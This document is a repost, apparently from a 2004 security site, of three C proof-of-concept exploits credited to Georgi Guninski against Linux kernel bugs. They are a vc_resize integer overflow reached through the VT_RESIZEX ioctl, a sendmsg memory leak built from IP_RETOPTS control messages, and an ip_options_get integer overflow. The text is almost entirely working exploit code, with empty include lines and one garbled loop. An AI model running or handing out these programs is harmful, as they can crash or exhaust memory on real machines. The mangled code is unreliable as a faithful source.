/* vc_resize int overflow * Copyright Georgi Guninski * Cannot be used in vulnerability databases * */ #include #include #include #include #include #include #include #include #include #include int main(int ac, char **av) { int fd; struct vt_consize vv; int cou=4242; fd=open("/dev/tty",O_RDWR); if (fd<0) {perror("open");return -42;} memset(&vv,0,sizeof(vv)); vv.v_clin=0; vv.v_vcol=0; vv.v_ccol=0; /* magic values, overflow on i386*/ vv.v_rows=65535; vv.v_cols=32769; system("sync"); if (ioctl(fd,VT_RESIZEX,&vv) < 0) {perror("ioctl");return -4242;} while(cou--) printf(";)\n"); close(fd); return 42; } /* memory leak * Copyright Georgi Guninski * Cannot be used in vulnerability databases (like securityfocus and mitre) * */ #include #include #include #include #include #include #include #include #include #include int main(int ac,char **av) { struct msghdr msghdr; struct iovec iovector[10]; int i,s,j,ma; struct sockaddr_in sockad; char msg[128]; struct cmsghdr *cmsg,*cm2; char opts[24]; ma=250; printf("just wait and watch memory usage\n"); memset(opts,0,sizeof(opts)); while(42) { s=socket(PF_INET, /*SOCK_STREAM*/ SOCK_DGRAM, 0); sockad.sin_family = AF_INET; sockad.sin_addr.s_addr=inet_addr("127.0.0.1"); sockad.sin_port=htons(8080); connect(s,(struct sockaddr *) &sockad, sizeof(sockad)); memset(msg,'v',sizeof(msg)); #define VV (ma*(sizeof(struct cmsghdr)+sizeof(opts))+1024*1024) cmsg = malloc(VV); memset(cmsg,0,VV); cmsg->cmsg_len = sizeof(struct cmsghdr) + sizeof(opts); cmsg->cmsg_level = SOL_IP; cmsg->cmsg_type = IP_RETOPTS; memcpy(CMSG_DATA(cmsg), opts, sizeof(opts)); cm2= (struct cmsghdr *) (long) ((char *)CMSG_DATA(cmsg)+sizeof(opts)); for(j=0;jcmsg_level = SOL_IP; cm2->cmsg_type = IP_RETOPTS; cm2->cmsg_len = sizeof(struct cmsghdr) + sizeof(opts); cm2= (struct cmsghdr *) (long) ((char *)CMSG_DATA(cm2)+sizeof(opts)); } cm2->cmsg_level = SOL_IP; cm2->cmsg_type = IP_RETOPTS; cm2->cmsg_len = sizeof(struct cmsghdr) + 8; msghdr.msg_name = &sockad; msghdr.msg_namelen = sizeof(sockad); msghdr.msg_control=cmsg; msghdr.msg_controllen= cmsg->cmsg_len + (j)*cmsg->cmsg_len+cm2->cmsg_len; msghdr.msg_iov = iovector; msghdr.msg_iovlen = 1; iovector[0].iov_base = msg; iovector[0].iov_len = sizeof(msg); if ((i = sendmsg(s, &msghdr, 0)) < 0) {perror("sendmsg");return -42;} close(s); free(cmsg); } return 42; } /* int overflow in ip_options_get * Copyright Georgi Guninski * Cannot be used in vulnerability databases (like securityfocus and mitre) * */ #include #include #include #include #include #include #include #include #include #include int main(int ac,char **av) { struct msghdr msghdr; struct iovec iovector[10]; int i,s; struct sockaddr_in sockad; char msg[128]; struct cmsghdr *cmsg,*cm2; char opts[12]; s=socket(PF_INET, /*SOCK_STREAM*/ SOCK_DGRAM, 0); sockad.sin_family = AF_INET; sockad.sin_addr.s_addr=inet_addr("127.0.0.1"); sockad.sin_port=htons(8080); connect(s,(struct sockaddr *) &sockad, sizeof(sockad)); memset(msg,'v',sizeof(msg)); memset(opts,0,sizeof(opts)); #define VV 1024*1024 cmsg = malloc(VV); memset(cmsg,0,VV); cmsg->cmsg_len = sizeof(struct cmsghdr) + sizeof(opts); cmsg->cmsg_level = SOL_IP; cmsg->cmsg_type = IP_RETOPTS; memcpy(CMSG_DATA(cmsg), opts, sizeof(opts)); cm2= (struct cmsghdr *) (long) ((char *)CMSG_DATA(cmsg)+sizeof(opts)); cm2->cmsg_level = SOL_IP; cm2->cmsg_type = IP_RETOPTS; cm2->cmsg_len = -1; msghdr.msg_name = &sockad; msghdr.msg_namelen = sizeof(sockad); msghdr.msg_control=cmsg; msghdr.msg_controllen= cmsg->cmsg_len + 420; msghdr.msg_iov = iovector; msghdr.msg_iovlen = 1; iovector[0].iov_base = msg; iovector[0].iov_len = sizeof(msg); system("sync"); if ((i = sendmsg(s, &msghdr, 0)) < 0) perror("sendmsg"); return 42; } securitydot.net - 2004-12-16